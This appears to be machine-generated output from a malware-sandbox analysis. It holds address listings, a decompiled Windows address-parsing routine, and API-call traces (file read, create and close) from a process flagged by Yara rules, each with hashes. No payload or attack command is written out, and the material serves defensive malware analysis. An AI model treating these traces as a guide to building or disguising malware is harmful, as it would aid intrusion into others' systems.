                                                                                                                                                            0x009b245b
                                                                                                                                                            0x0097eb99
                                                                                                                                                            0x0097eb99
                                                                                                                                                            0x0097eb9c
                                                                                                                                                            0x0097eb9d
                                                                                                                                                            0x0097eb9f
                                                                                                                                                            0x0097eba2
                                                                                                                                                            0x009b2465
                                                                                                                                                            0x009b246b
                                                                                                                                                            0x009b246d
                                                                                                                                                            0x0097eba8
                                                                                                                                                            0x0097eba9
                                                                                                                                                            0x0097eba9
                                                                                                                                                            0x0097ebae
                                                                                                                                                            0x0097ebb3
                                                                                                                                                            0x0097ebb9
                                                                                                                                                            0x0097ebbb
                                                                                                                                                            0x009b2513
                                                                                                                                                            0x009b2514
                                                                                                                                                            0x009b2519
                                                                                                                                                            0x009b251b
                                                                                                                                                            0x0097ec2a
                                                                                                                                                            0x0097ec2d
                                                                                                                                                            0x0097ec33
                                                                                                                                                            0x0097ec36
                                                                                                                                                            0x0097ec3a
                                                                                                                                                            0x0097ec3e
                                                                                                                                                            0x0097ec40
                                                                                                                                                            0x0097ec47
                                                                                                                                                            0x0097ec47
                                                                                                                                                            0x0097ec40
                                                                                                                                                            0x009522c6
                                                                                                                                                            0x0097ebc1
                                                                                                                                                            0x0097ebc1
                                                                                                                                                            0x0097ebc5
                                                                                                                                                            0x0097ec9a
                                                                                                                                                            0x0097ec9a
                                                                                                                                                            0x0097ebd6
                                                                                                                                                            0x0097ebd6
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0097ebbb
                                                                                                                                                            0x009b2477
                                                                                                                                                            0x009b247c
                                                                                                                                                            0x009b2486
                                                                                                                                                            0x009b248b
                                                                                                                                                            0x009b2496
                                                                                                                                                            0x009b249b
                                                                                                                                                            0x009b249d
                                                                                                                                                            0x009b24a0
                                                                                                                                                            0x009b24a3
                                                                                                                                                            0x009b24aa
                                                                                                                                                            0x009b24aa
                                                                                                                                                            0x009b24a5
                                                                                                                                                            0x009b24a5
                                                                                                                                                            0x009b24a5
                                                                                                                                                            0x009b24ac
                                                                                                                                                            0x009b24af
                                                                                                                                                            0x009b24b0
                                                                                                                                                            0x009b24b3
                                                                                                                                                            0x009b24b9
                                                                                                                                                            0x009b24ba
                                                                                                                                                            0x009b24bb
                                                                                                                                                            0x009b24c6
                                                                                                                                                            0x009b24cb
                                                                                                                                                            0x009b24cd
                                                                                                                                                            0x009b24d0
                                                                                                                                                            0x009b24d1
                                                                                                                                                            0x009b24d4
                                                                                                                                                            0x009b24d6
                                                                                                                                                            0x009b24d9
                                                                                                                                                            0x009b24d9
                                                                                                                                                            0x009b24dc
                                                                                                                                                            0x009b24df
                                                                                                                                                            0x009b24e1
                                                                                                                                                            0x009b24e7
                                                                                                                                                            0x009b24e9
                                                                                                                                                            0x009b24ec
                                                                                                                                                            0x009b24ef
                                                                                                                                                            0x009b24f2
                                                                                                                                                            0x009b24f2
                                                                                                                                                            0x009b24ef
                                                                                                                                                            0x009b24e7
                                                                                                                                                            0x009b24fa
                                                                                                                                                            0x009b24ff
                                                                                                                                                            0x009b2501
                                                                                                                                                            0x009b2503
                                                                                                                                                            0x009b2506
                                                                                                                                                            0x009b250b
                                                                                                                                                            0x0097eb8c
                                                                                                                                                            0x0097eb93
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0097eb93
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0097eb99
                                                                                                                                                            0x0097ec85
                                                                                                                                                            0x0097ec85
                                                                                                                                                            0x0097ec85
                                                                                                                                                            0x00000000

                                                                                                                                                            Strings
                                                                                                                                                            • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 009B24BD
                                                                                                                                                            • RTL: Re-Waiting, xrefs: 009B24FA
                                                                                                                                                            • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 009B248D
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.2218202835.0000000000940000.00000040.00000001.sdmp, Offset: 00930000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.2218194748.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218362808.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218367843.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218373725.0000000000A34000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218380017.0000000000A37000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218387315.0000000000A40000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218455487.0000000000AA0000.00000040.00000001.sdmp Download File
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                                                                                                                            • API String ID: 0-3177188983
                                                                                                                                                            • Opcode ID: d3b53fc1975c46a1dd6f7e8db857e33980db99a23e04a5fe0722f3bdd2f21b26
                                                                                                                                                            • Instruction ID: a2559d575a14255ae1455952f20b5b4d47aa3f11a103e29090c0a3f197c15ee6
                                                                                                                                                            • Opcode Fuzzy Hash: d3b53fc1975c46a1dd6f7e8db857e33980db99a23e04a5fe0722f3bdd2f21b26
                                                                                                                                                            • Instruction Fuzzy Hash: B0412971600204AFDB20DF69CD85FAE77ADEF88720F20CA45F9599B2D1D734E94187A0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E0098FCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
                                                                                                                                                            				signed int _v8;
                                                                                                                                                            				signed int _v12;
                                                                                                                                                            				signed int _v16;
                                                                                                                                                            				signed int _v20;
                                                                                                                                                            				signed int _v24;
                                                                                                                                                            				signed int _v28;
                                                                                                                                                            				signed int _t105;
                                                                                                                                                            				void* _t110;
                                                                                                                                                            				char _t114;
                                                                                                                                                            				short _t115;
                                                                                                                                                            				void* _t118;
                                                                                                                                                            				signed short* _t119;
                                                                                                                                                            				short _t120;
                                                                                                                                                            				char _t122;
                                                                                                                                                            				void* _t127;
                                                                                                                                                            				void* _t130;
                                                                                                                                                            				signed int _t136;
                                                                                                                                                            				intOrPtr _t143;
                                                                                                                                                            				signed int _t158;
                                                                                                                                                            				signed short* _t164;
                                                                                                                                                            				signed int _t167;
                                                                                                                                                            				void* _t170;
                                                                                                                                                            
                                                                                                                                                            				_t158 = 0;
                                                                                                                                                            				_t164 = _a4;
                                                                                                                                                            				_v20 = 0;
                                                                                                                                                            				_v24 = 0;
                                                                                                                                                            				_v8 = 0;
                                                                                                                                                            				_v12 = 0;
                                                                                                                                                            				_v16 = 0;
                                                                                                                                                            				_v28 = 0;
                                                                                                                                                            				_t136 = 0;
                                                                                                                                                            				while(1) {
                                                                                                                                                            					_t167 =  *_t164 & 0x0000ffff;
                                                                                                                                                            					if(_t167 == _t158) {
                                                                                                                                                            						break;
                                                                                                                                                            					}
                                                                                                                                                            					_t118 = _v20 - _t158;
                                                                                                                                                            					if(_t118 == 0) {
                                                                                                                                                            						if(_t167 == 0x3a) {
                                                                                                                                                            							if(_v12 > _t158 || _v8 > _t158) {
                                                                                                                                                            								break;
                                                                                                                                                            							} else {
                                                                                                                                                            								_t119 =  &(_t164[1]);
                                                                                                                                                            								if( *_t119 != _t167) {
                                                                                                                                                            									break;
                                                                                                                                                            								}
                                                                                                                                                            								_t143 = 2;
                                                                                                                                                            								 *((short*)(_a12 + _t136 * 2)) = 0;
                                                                                                                                                            								_v28 = 1;
                                                                                                                                                            								_v8 = _t143;
                                                                                                                                                            								_t136 = _t136 + 1;
                                                                                                                                                            								L47:
                                                                                                                                                            								_t164 = _t119;
                                                                                                                                                            								_v20 = _t143;
                                                                                                                                                            								L14:
                                                                                                                                                            								if(_v24 == _t158) {
                                                                                                                                                            									L19:
                                                                                                                                                            									_t164 =  &(_t164[1]);
                                                                                                                                                            									_t158 = 0;
                                                                                                                                                            									continue;
                                                                                                                                                            								}
                                                                                                                                                            								if(_v12 == _t158) {
                                                                                                                                                            									if(_v16 > 4) {
                                                                                                                                                            										L29:
                                                                                                                                                            										return 0xc000000d;
                                                                                                                                                            									}
                                                                                                                                                            									_t120 = E0098EE02(_v24, _t158, 0x10);
                                                                                                                                                            									_t170 = _t170 + 0xc;
                                                                                                                                                            									 *((short*)(_a12 + _t136 * 2)) = _t120;
                                                                                                                                                            									_t136 = _t136 + 1;
                                                                                                                                                            									goto L19;
                                                                                                                                                            								}
                                                                                                                                                            								if(_v16 > 3) {
                                                                                                                                                            									goto L29;
                                                                                                                                                            								}
                                                                                                                                                            								_t122 = E0098EE02(_v24, _t158, 0xa);
                                                                                                                                                            								_t170 = _t170 + 0xc;
                                                                                                                                                            								if(_t122 > 0xff) {
                                                                                                                                                            									goto L29;
                                                                                                                                                            								}
                                                                                                                                                            								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
                                                                                                                                                            								goto L19;
                                                                                                                                                            							}
                                                                                                                                                            						}
                                                                                                                                                            						L21:
                                                                                                                                                            						if(_v8 > 7 || _t167 >= 0x80) {
                                                                                                                                                            							break;
                                                                                                                                                            						} else {
                                                                                                                                                            							if(E0098685D(_t167, 4) == 0) {
                                                                                                                                                            								if(E0098685D(_t167, 0x80) != 0) {
                                                                                                                                                            									if(_v12 > 0) {
                                                                                                                                                            										break;
                                                                                                                                                            									}
                                                                                                                                                            									_t127 = 1;
                                                                                                                                                            									_a7 = 1;
                                                                                                                                                            									_v24 = _t164;
                                                                                                                                                            									_v20 = 1;
                                                                                                                                                            									_v16 = 1;
                                                                                                                                                            									L36:
                                                                                                                                                            									if(_v20 == _t127) {
                                                                                                                                                            										goto L19;
                                                                                                                                                            									}
                                                                                                                                                            									_t158 = 0;
                                                                                                                                                            									goto L14;
                                                                                                                                                            								}
                                                                                                                                                            								break;
                                                                                                                                                            							}
                                                                                                                                                            							_a7 = 0;
                                                                                                                                                            							_v24 = _t164;
                                                                                                                                                            							_v20 = 1;
                                                                                                                                                            							_v16 = 1;
                                                                                                                                                            							goto L19;
                                                                                                                                                            						}
                                                                                                                                                            					}
                                                                                                                                                            					_t130 = _t118 - 1;
                                                                                                                                                            					if(_t130 != 0) {
                                                                                                                                                            						if(_t130 == 1) {
                                                                                                                                                            							goto L21;
                                                                                                                                                            						}
                                                                                                                                                            						_t127 = 1;
                                                                                                                                                            						goto L36;
                                                                                                                                                            					}
                                                                                                                                                            					if(_t167 >= 0x80) {
                                                                                                                                                            						L7:
                                                                                                                                                            						if(_t167 == 0x3a) {
                                                                                                                                                            							_t158 = 0;
                                                                                                                                                            							if(_v12 > 0 || _v8 > 6) {
                                                                                                                                                            								break;
                                                                                                                                                            							} else {
                                                                                                                                                            								_t119 =  &(_t164[1]);
                                                                                                                                                            								if( *_t119 != _t167) {
                                                                                                                                                            									_v8 = _v8 + 1;
                                                                                                                                                            									L13:
                                                                                                                                                            									_v20 = _t158;
                                                                                                                                                            									goto L14;
                                                                                                                                                            								}
                                                                                                                                                            								if(_v28 != 0) {
                                                                                                                                                            									break;
                                                                                                                                                            								}
                                                                                                                                                            								_v28 = _v8 + 1;
                                                                                                                                                            								_t143 = 2;
                                                                                                                                                            								_v8 = _v8 + _t143;
                                                                                                                                                            								goto L47;
                                                                                                                                                            							}
                                                                                                                                                            						}
                                                                                                                                                            						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
                                                                                                                                                            							break;
                                                                                                                                                            						} else {
                                                                                                                                                            							_v12 = _v12 + 1;
                                                                                                                                                            							_t158 = 0;
                                                                                                                                                            							goto L13;
                                                                                                                                                            						}
                                                                                                                                                            					}
                                                                                                                                                            					if(E0098685D(_t167, 4) != 0) {
                                                                                                                                                            						_v16 = _v16 + 1;
                                                                                                                                                            						goto L19;
                                                                                                                                                            					}
                                                                                                                                                            					if(E0098685D(_t167, 0x80) != 0) {
                                                                                                                                                            						_v16 = _v16 + 1;
                                                                                                                                                            						if(_v12 > 0) {
                                                                                                                                                            							break;
                                                                                                                                                            						}
                                                                                                                                                            						_a7 = 1;
                                                                                                                                                            						goto L19;
                                                                                                                                                            					}
                                                                                                                                                            					goto L7;
                                                                                                                                                            				}
                                                                                                                                                            				 *_a8 = _t164;
                                                                                                                                                            				if(_v12 != 0) {
                                                                                                                                                            					if(_v12 != 3) {
                                                                                                                                                            						goto L29;
                                                                                                                                                            					}
                                                                                                                                                            					_v8 = _v8 + 1;
                                                                                                                                                            				}
                                                                                                                                                            				if(_v28 != 0 || _v8 == 7) {
                                                                                                                                                            					if(_v20 != 1) {
                                                                                                                                                            						if(_v20 != 2) {
                                                                                                                                                            							goto L29;
                                                                                                                                                            						}
                                                                                                                                                            						 *((short*)(_a12 + _t136 * 2)) = 0;
                                                                                                                                                            						L65:
                                                                                                                                                            						_t105 = _v28;
                                                                                                                                                            						if(_t105 != 0) {
                                                                                                                                                            							_t98 = (_t105 - _v8) * 2; // 0x11
                                                                                                                                                            							E00968980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
                                                                                                                                                            							_t110 = 8;
                                                                                                                                                            							E0095DFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
                                                                                                                                                            						}
                                                                                                                                                            						return 0;
                                                                                                                                                            					}
                                                                                                                                                            					if(_v12 != 0) {
                                                                                                                                                            						if(_v16 > 3) {
                                                                                                                                                            							goto L29;
                                                                                                                                                            						}
                                                                                                                                                            						_t114 = E0098EE02(_v24, 0, 0xa);
                                                                                                                                                            						_t170 = _t170 + 0xc;
                                                                                                                                                            						if(_t114 > 0xff) {
                                                                                                                                                            							goto L29;
                                                                                                                                                            						}
                                                                                                                                                            						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
                                                                                                                                                            						goto L65;
                                                                                                                                                            					}
                                                                                                                                                            					if(_v16 > 4) {
                                                                                                                                                            						goto L29;
                                                                                                                                                            					}
                                                                                                                                                            					_t115 = E0098EE02(_v24, 0, 0x10);
                                                                                                                                                            					_t170 = _t170 + 0xc;
                                                                                                                                                            					 *((short*)(_a12 + _t136 * 2)) = _t115;
                                                                                                                                                            					goto L65;
                                                                                                                                                            				} else {
                                                                                                                                                            					goto L29;
                                                                                                                                                            				}
                                                                                                                                                            			}

























                                                                                                                                                            0x0098fcd1
                                                                                                                                                            0x0098fcd6
                                                                                                                                                            0x0098fcd9
                                                                                                                                                            0x0098fcdc
                                                                                                                                                            0x0098fcdf
                                                                                                                                                            0x0098fce2
                                                                                                                                                            0x0098fce5
                                                                                                                                                            0x0098fce8
                                                                                                                                                            0x0098fceb
                                                                                                                                                            0x0098fced
                                                                                                                                                            0x0098fced
                                                                                                                                                            0x0098fcf3
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0098fcfc
                                                                                                                                                            0x0098fcfe
                                                                                                                                                            0x0098fdc1
                                                                                                                                                            0x009becbd
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009beccc
                                                                                                                                                            0x009beccc
                                                                                                                                                            0x009becd2
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009becdf
                                                                                                                                                            0x009bece0
                                                                                                                                                            0x009bece4
                                                                                                                                                            0x009beceb
                                                                                                                                                            0x009becee
                                                                                                                                                            0x009beca8
                                                                                                                                                            0x009beca8
                                                                                                                                                            0x009becaa
                                                                                                                                                            0x0098fd76
                                                                                                                                                            0x0098fd79
                                                                                                                                                            0x0098fdb4
                                                                                                                                                            0x0098fdb5
                                                                                                                                                            0x0098fdb6
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0098fdb6
                                                                                                                                                            0x0098fd7e
                                                                                                                                                            0x009becfc
                                                                                                                                                            0x0098fe2f
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0098fe2f
                                                                                                                                                            0x009bed08
                                                                                                                                                            0x009bed0f
                                                                                                                                                            0x009bed17
                                                                                                                                                            0x009bed1b
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009bed1b
                                                                                                                                                            0x0098fd88
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0098fd94
                                                                                                                                                            0x0098fd99
                                                                                                                                                            0x0098fda1
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0098fdb0
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0098fdb0
                                                                                                                                                            0x009becbd
                                                                                                                                                            0x0098fdc7
                                                                                                                                                            0x0098fdcb
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0098fdd7
                                                                                                                                                            0x0098fde3
                                                                                                                                                            0x0098fe06
                                                                                                                                                            0x009a1fe7
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009a1fef
                                                                                                                                                            0x009a1ff0
                                                                                                                                                            0x009a1ff4
                                                                                                                                                            0x009a1ff7
                                                                                                                                                            0x009a1ffa
                                                                                                                                                            0x009a1ffd
                                                                                                                                                            0x009a2000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009becf1
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009becf1
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0098fe06
                                                                                                                                                            0x0098fde8
                                                                                                                                                            0x0098fdec
                                                                                                                                                            0x0098fdef
                                                                                                                                                            0x0098fdf2
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0098fdf2
                                                                                                                                                            0x0098fdcb
                                                                                                                                                            0x0098fd04
                                                                                                                                                            0x0098fd05
                                                                                                                                                            0x009bec67
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009bec6f
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009bec6f
                                                                                                                                                            0x0098fd13
                                                                                                                                                            0x0098fd3c
                                                                                                                                                            0x0098fd40
                                                                                                                                                            0x009bec75
                                                                                                                                                            0x009bec7a
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009bec8a
                                                                                                                                                            0x009bec8a
                                                                                                                                                            0x009bec90
                                                                                                                                                            0x009becb2
                                                                                                                                                            0x0098fd73
                                                                                                                                                            0x0098fd73
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0098fd73
                                                                                                                                                            0x009bec95
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009beca1
                                                                                                                                                            0x009beca4
                                                                                                                                                            0x009beca5
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009beca5
                                                                                                                                                            0x009bec7a
                                                                                                                                                            0x0098fd4a
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0098fd6e
                                                                                                                                                            0x0098fd6e
                                                                                                                                                            0x0098fd71
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0098fd71
                                                                                                                                                            0x0098fd4a
                                                                                                                                                            0x0098fd21
                                                                                                                                                            0x0099a3a1
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0099a3a1
                                                                                                                                                            0x0098fd36
                                                                                                                                                            0x009a200b
                                                                                                                                                            0x009a2012
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009a2018
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009a2018
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0098fd36
                                                                                                                                                            0x0098fe0f
                                                                                                                                                            0x0098fe16
                                                                                                                                                            0x0099a3ad
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0099a3b3
                                                                                                                                                            0x0099a3b3
                                                                                                                                                            0x0098fe1f
                                                                                                                                                            0x009bed25
                                                                                                                                                            0x009bed86
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009bed91
                                                                                                                                                            0x009bed95
                                                                                                                                                            0x009bed95
                                                                                                                                                            0x009bed9a
                                                                                                                                                            0x009bedad
                                                                                                                                                            0x009bedb3
                                                                                                                                                            0x009bedba
                                                                                                                                                            0x009bedc4
                                                                                                                                                            0x009bedc9
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009bedcc
                                                                                                                                                            0x009bed2a
                                                                                                                                                            0x009bed55
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009bed61
                                                                                                                                                            0x009bed66
                                                                                                                                                            0x009bed6e
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009bed7d
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009bed7d
                                                                                                                                                            0x009bed30
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009bed3c
                                                                                                                                                            0x009bed43
                                                                                                                                                            0x009bed4b
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000

                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.2218202835.0000000000940000.00000040.00000001.sdmp, Offset: 00930000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.2218194748.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218362808.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218367843.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218373725.0000000000A34000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218380017.0000000000A37000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218387315.0000000000A40000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218455487.0000000000AA0000.00000040.00000001.sdmp Download File
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __fassign
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3965848254-0
                                                                                                                                                            • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                                                                                            • Instruction ID: dcec933bcb0858312c8e691b9d01a731636981f80a051a1de2d584206f4bafbf
                                                                                                                                                            • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                                                                                            • Instruction Fuzzy Hash: EC918D31D0020AEBDF24EF98C8556EEB7B8FF95314F20947AD441EB2A2E7344A41CB91
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Executed Functions

                                                                                                                                                            APIs
                                                                                                                                                            • NtReadFile.NTDLL(?,?,FFFFFFFF,000D4A01,?,?,?,?,000D4A01,FFFFFFFF,?,BM,?,00000000), ref: 000D9E55
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2379844728.00000000000C0000.00000040.00000001.sdmp, Offset: 000C0000, based on PE: false
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FileRead
                                                                                                                                                            • String ID: H
                                                                                                                                                            • API String ID: 2738559852-2720017708
                                                                                                                                                            • Opcode ID: c1fa000e90d34bf42ddfbf86a07caf1619767b7776371418e6baa9b9c10b0ef5
                                                                                                                                                            • Instruction ID: 82abba1e89702cd9db0729bc189aaa029af524568d380deb68ae49b1097be5b8
                                                                                                                                                            • Opcode Fuzzy Hash: c1fa000e90d34bf42ddfbf86a07caf1619767b7776371418e6baa9b9c10b0ef5
                                                                                                                                                            • Instruction Fuzzy Hash: 7321DBB6200208AFDB14DF99DC94EEB77A9EF8C714F158649BE1DA7241C630E811CBA0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • NtCreateFile.NTDLL(00000060,00000000,.z`,000D4B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,000D4B87,007A002E,00000000,00000060,00000000,00000000), ref: 000D9DAD
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2379844728.00000000000C0000.00000040.00000001.sdmp, Offset: 000C0000, based on PE: false
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                            • String ID: .z`
                                                                                                                                                            • API String ID: 823142352-1441809116
                                                                                                                                                            • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                                                            • Instruction ID: 2e6de0adc303a25ffa1861b19db1812300d1f896f3101c2d979b27e1fb2a7d94
                                                                                                                                                            • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                                                            • Instruction Fuzzy Hash: CCF0B2B2200208ABCB08CF88DC95EEB77ADAF8C754F158248BA0D97241C630E8118BA4
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • NtCreateFile.NTDLL(00000060,00000000,.z`,000D4B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,000D4B87,007A002E,00000000,00000060,00000000,00000000), ref: 000D9DAD
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2379844728.00000000000C0000.00000040.00000001.sdmp, Offset: 000C0000, based on PE: false
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                            • String ID: .z`
                                                                                                                                                            • API String ID: 823142352-1441809116
                                                                                                                                                            • Opcode ID: 86142fc715fd6b29a1cd1e0a8e5842023ce0c7e8d2a8b88b8c4b4948ad2c766f
                                                                                                                                                            • Instruction ID: af1378a9475db2060b3eab7b79125e47130d6aac356c9c8531852839504ad9c6
                                                                                                                                                            • Opcode Fuzzy Hash: 86142fc715fd6b29a1cd1e0a8e5842023ce0c7e8d2a8b88b8c4b4948ad2c766f
                                                                                                                                                            • Instruction Fuzzy Hash: F8F07FB2201108AFCB48CF98DC95EEB77A9EF8C754F158248FA1DE7241D630E851CBA4
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • NtCreateFile.NTDLL(00000060,00000000,.z`,000D4B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,000D4B87,007A002E,00000000,00000060,00000000,00000000), ref: 000D9DAD
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2379844728.00000000000C0000.00000040.00000001.sdmp, Offset: 000C0000, based on PE: false
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                            • String ID: .z`
                                                                                                                                                            • API String ID: 823142352-1441809116
                                                                                                                                                            • Opcode ID: 7d1d0dd45730a3cab19d534196467145361a0f767e4c637b4ebc2c5e092f58ac
                                                                                                                                                            • Instruction ID: 04c64c90921e39cfdd324f6a40898d6b5460ba20f7e357acf6879422449f5e61
                                                                                                                                                            • Opcode Fuzzy Hash: 7d1d0dd45730a3cab19d534196467145361a0f767e4c637b4ebc2c5e092f58ac
                                                                                                                                                            • Instruction Fuzzy Hash: CAF079B2204109AF8B48DE8CD881CEB73AAAF8C744B118208FA0DD3240D630E8518BA4
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • NtClose.NTDLL( M,?,?,000D4D20,00000000,FFFFFFFF), ref: 000D9EB5
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2379844728.00000000000C0000.00000040.00000001.sdmp, Offset: 000C0000, based on PE: false
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Close
                                                                                                                                                            • String ID: M
                                                                                                                                                            • API String ID: 3535843008-4234859015
                                                                                                                                                            • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                                                            • Instruction ID: bfbae8ed509d428d0c6daed5a07a3511c6db8a1d2052cd28d898511e090b1b2a
                                                                                                                                                            • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                                                            • Instruction Fuzzy Hash: 6AD012752003146BD710EB98CC85ED7775CEF45750F154455BA585B242C530F50086E0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • NtReadFile.NTDLL(?,?,FFFFFFFF,000D4A01,?,?,?,?,000D4A01,FFFFFFFF,?,BM,?,00000000), ref: 000D9E55
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2379844728.00000000000C0000.00000040.00000001.sdmp, Offset: 000C0000, based on PE: false
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FileRead
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2738559852-0
                                                                                                                                                            • Opcode ID: 93eb0eb999d413ebda49711963d4b38f3d66a9e8483457c18ca6db01c9c7dd9f
                                                                                                                                                            • Instruction ID: 04081e953e129d1d9fc66cd59e554706b8083bf8a902c6c72e2c6cfb40798a09
